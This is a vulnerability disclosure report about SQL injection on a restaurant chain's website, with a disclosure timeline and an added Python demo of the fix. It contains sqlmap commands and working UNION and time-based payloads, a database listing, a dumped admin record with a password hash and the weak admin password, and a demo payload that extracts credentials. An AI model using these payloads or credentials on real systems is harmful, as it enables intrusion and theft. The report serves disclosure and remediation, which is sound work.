2015-08-22: Details reported to the vendor; awaiting vendor handling
2015-08-25: CNCERT (National Internet Emergency Center) was temporarily unable to contact the relevant organization; details disclosed only to the notifying body
2015-09-04: Details disclosed to core white hats and experts in the relevant field
2015-09-14: Details disclosed to regular white hats
2015-09-24: Details disclosed to intern white hats
2015-10-09: Details disclosed to the public
九毛九 SQL injection vulnerability: multiple databases exposed, weak admin panel password.
POST injection on the homepage
sqlmap.py -u http://**.**.**.**/index.html --forms
The scan identified a Windows 2003 system running Microsoft IIS 6.0, PHP 5.3.28 and MySQL 5.0.12.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: gjz (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: gjz=CHpn') AND (SELECT * FROM (SELECT(SLEEP(5)))rPWy) AND ('cwEA'='cwEA&=

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: gjz=CHpn') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7671,0x714a504556644a587757,0x7176717171),NULL,NULL-- &=
---
do you want to exploit this SQL injection? [Y/n]
[23:52:59] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, PHP 5.3.28
back-end DBMS: MySQL 5.0.12
Admin panel URL:
http://www.**.**.**.**/admin/
The admin username admin and password 11111 could be read out of the database; once logged in to the admin panel, site content can be changed at will.
[23:52:59] [INFO] fetching database names
available databases [9]:
[*] db_dodi
[*] disc
[*] information_schema
[*] jmjweb
[*] mysql
[*] performance_schema
[*] test
[*] ultrax
[*] wxac
Database: jmjweb
[17 tables]
+-----------------+
| admin           |
| admin_menu      |
| admin_power     |
| admin_powerzllb |
| createhtml      |
| guestbook       |
| itemconfig      |
| jbzl            |
| link            |
| mainpage        |
| news            |
| news_item       |
| news_tags       |
| news_zllb       |
| product         |
| product_zllb    |
| wwwuser         |
+-----------------+
Database: jmjweb
Table: admin
[1 entry]
+---------------------+----------------------------------+----------+----------+---------------------+----------------+
| reg_tm              | userpwd                          | username | realname | login_tm            | login_ip       |
+---------------------+----------------------------------+----------+----------+---------------------+----------------+
| 2010-07-16 00:00:00 | 96e79218965eb72c92a549dd5a330112 | admin    | 绠$.?.   | 2015-08-18 21:32:22 | **.**.**.**    |
+---------------------+----------------------------------+----------+----------+---------------------+----------------+
Admin panel
Content can be changed at will
Filter the input parameters
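To make the fix concrete, the following is an added example (not code from the report or from the site in question) showing the defect class sqlmap found in the homepage form beside its hardened form. The schema, column names, search query and hash value are all constructed for the demonstration; the report names the `news` and `admin` tables in database `jmjweb` but not their columns, and the real site runs PHP/MySQL, so SQLite is used here only so the example runs stand-alone. The payload has the same shape as the report's UNION payload (close the quote and parenthesis, append a UNION with a matching column count, comment out the tail) but targets the constructed schema.

```python
import sqlite3


def make_db():
    """Constructed in-memory sample database (not the site's real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE news(id INTEGER, title TEXT);
        CREATE TABLE admin(username TEXT, userpwd TEXT);
        INSERT INTO news VALUES (1, 'Opening hours'), (2, 'New menu');
        INSERT INTO admin VALUES ('admin', 'constructed-hash-placeholder');
        """
    )
    return conn


def search_vulnerable(conn, gjz):
    """Vulnerable keyword search: the POST value `gjz` is spliced straight into
    the SQL text, so a value that closes the quote and parenthesis rewrites the
    query. This is the pattern that lets a UNION payload read other tables."""
    sql = "SELECT id, title FROM news WHERE (title LIKE '%" + gjz + "%')"
    return conn.execute(sql).fetchall()


def search_fixed(conn, gjz):
    """Hardened keyword search: `gjz` is passed as a bound parameter, so the
    driver never interprets its contents as SQL. The wildcard wrapping is done
    inside SQL with `||` so the bound value itself stays opaque text."""
    sql = "SELECT id, title FROM news WHERE (title LIKE '%' || ? || '%')"
    return conn.execute(sql, (gjz,)).fetchall()


# Constructed payload mirroring the report's UNION technique, adapted to the
# two-column constructed schema above.
PAYLOAD = "x') UNION ALL SELECT username, userpwd FROM admin-- "


def compare(conn):
    """Run the same inputs through both versions; returns results for review."""
    return {
        "vulnerable_with_payload": search_vulnerable(conn, PAYLOAD),
        "fixed_with_payload": search_fixed(conn, PAYLOAD),
        "fixed_normal_search": search_fixed(conn, "menu"),
    }


if __name__ == "__main__":
    for name, rows in compare(make_db()).items():
        print(f"{name}: {rows}")
```

With the concatenated query the payload returns the `admin` row, which is exactly how the report's `admin` table dump was obtained; with the bound parameter the same input is treated as a literal search string, matches nothing, and a legitimate search still works. Note that "filtering" by blacklisting characters is weaker than parameterization, since the report's time-based payload shows the form already accepts arbitrary text.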
Severity: High
Vulnerability Rank: 11
Confirmation time: 2015-08-25 10:16
No direct handling channel with the site's administering organization has been established yet; awaiting claim.
None